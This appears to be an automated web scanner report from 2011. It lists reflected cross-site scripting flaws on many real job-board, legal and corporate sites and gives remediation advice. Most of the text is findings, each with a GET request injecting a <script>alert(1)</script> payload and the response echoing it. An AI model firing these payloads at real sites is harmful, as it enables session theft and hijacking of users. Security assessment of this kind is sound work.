http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 3]
http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 4]
http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 5]
http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 6]
http://www.customerservicecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.dbacrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.dentalcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.designingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.diversitycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.dotnetcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]
http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]
http://www.ecommercecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.editingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.educationcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.employmentcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.energycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.engineeringcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.entrylevelcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.environmentalcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.environmentalsafetyhealthcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.erpcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.execcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.facilitiescrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.financialservicescrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.foodservicescrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.fundraisingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.giscrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.governmentcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.healthcarecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.helpdeskcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.hospitalitycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.hrcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.hvaccrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.informationtechnologycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.insurcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.intellectualpropertycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.internshipcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.j2eecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.journalismcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.lawcrossing.com/lcjssearchresults.php [name of an arbitrarily supplied request parameter]
http://www.logisticscrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.managercrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.manufacturingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.marketingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.mediajobcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.militarycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.nursingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.occupationaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.operationscrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.parttimecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.pharmaceuticalcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.physicalsecuritycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.physicaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.planningcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.postdoctoralfellowcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.prcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.procurementcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.productmanagercrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.projectmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.publicinterestcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.publishingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.purchasingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.qaqccrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.radiocrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.realestateandlandcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.recruitingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.researchingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.retailcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.sciencescrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.scientistcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.sellingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.sqlcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.teenagercrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.telecomcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 3]
http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 4]
http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 5]
http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 6]
http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 7]
http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 8]
http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
http://www.tradingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.trainingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.transportationcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.travelingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.truckingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.tvcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.underwritingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [REST URL parameter 4]
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [companyId parameter]
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [name of an arbitrarily supplied request parameter]
http://www.velaw.com/offices/offices.aspx [ctl00%24txtboxSearch parameter]
http://www.velaw.com/search/search_result.aspx [searchtext parameter]
http://www.velaw.com/workarea/csslib/ektronCss.ashx [id parameter]
http://www.velaw.com/workarea/java/ektronJs.ashx [id parameter]
http://www.veterinarycrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.volunteercrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.workathomecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.writingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.bcgsearch.com/searchresults.php [Referer HTTP header]
http://www.bmwusa.com/jsenvconst.ashx [User-Agent HTTP header]
http://www.employmentauthority.com/ [Referer HTTP header]
https://www.lawschoolloans.com/lslprivateloan_application.php [Referer HTTP header]
http://www.legalauthority.com/ [Referer HTTP header]
http://www.legalauthority.com/signup.php [Referer HTTP header]
http://www.legalauthority.com/tmlandingpage.php [Referer HTTP header]
http://www.toyota.com/mobility/index.html [REST URL parameter 1]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://www.100kcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.100kcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f63f4"><script>alert(1)</script>34aed88ca0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f63f4"><script>alert(1)</script>34aed88ca0a=1 HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gpaaeq68r61sips9loiulpogp4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106183

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.100kcrossing.com/?f63f4"><script>alert(1)</script>34aed88ca0a=1">
...[SNIP]...

3.2. http://www.accountingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accountingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d95ab"><script>alert(1)</script>abb072a1742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d95ab"><script>alert(1)</script>abb072a1742=1 HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vii0tqv2bfu5e91l3g27pd6l20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.accountingcrossing.com/?d95ab"><script>alert(1)</script>abb072a1742=1">
...[SNIP]...

3.3. http://www.accountmanagementcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accountmanagementcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a9f"><script>alert(1)</script>9bc7f776166 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d1a9f"><script>alert(1)</script>9bc7f776166=1 HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uue121nt18o8781h9829tgf502; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137374

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.accountmanagementcrossing.com/?d1a9f"><script>alert(1)</script>9bc7f776166=1">
...[SNIP]...

3.4. http://www.actuarialcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.actuarialcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb17"><script>alert(1)</script>ddc746c442e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2fb17"><script>alert(1)</script>ddc746c442e=1 HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ri9tldvibqror27ls0q7hbaik2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114344

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.actuarialcrossing.com/?2fb17"><script>alert(1)</script>ddc746c442e=1">
...[SNIP]...

3.5. http://www.admincrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.admincrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c58e"><script>alert(1)</script>11c63536f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3c58e"><script>alert(1)</script>11c63536f89=1 HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=49j0tdumr2co1irf1r26vht595; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:37 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109769

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.admincrossing.com/?3c58e"><script>alert(1)</script>11c63536f89=1">
...[SNIP]...

3.6. http://www.advertisingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.advertisingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd5"><script>alert(1)</script>8bdd32819ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?27cd5"><script>alert(1)</script>8bdd32819ff=1 HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9ft9gv5ubep1dgi1aaiqfl30e1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122002

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.advertisingcrossing.com/?27cd5"><script>alert(1)</script>8bdd32819ff=1">
...[SNIP]...

3.7. http://www.aerospacecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aerospacecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a515"><script>alert(1)</script>e723cb62ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9a515"><script>alert(1)</script>e723cb62ba=1 HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n2un0qqkikvurgvbtcinkgoti7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109453

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.aerospacecrossing.com/?9a515"><script>alert(1)</script>e723cb62ba=1">
...[SNIP]...

3.8. http://www.agriculturalcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.agriculturalcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bfb"><script>alert(1)</script>167dae7435c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?44bfb"><script>alert(1)</script>167dae7435c=1 HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9e2jfijg4pt89plgbsc9greko6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102580

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.agriculturalcrossing.com/?44bfb"><script>alert(1)</script>167dae7435c=1">
...[SNIP]...

3.9. http://www.aharrisonbarnes.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69719'><script>alert(1)</script>1fd47fb9727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69719\'><script>alert(1)</script>1fd47fb9727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?69719'><script>alert(1)</script>1fd47fb9727=1 HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
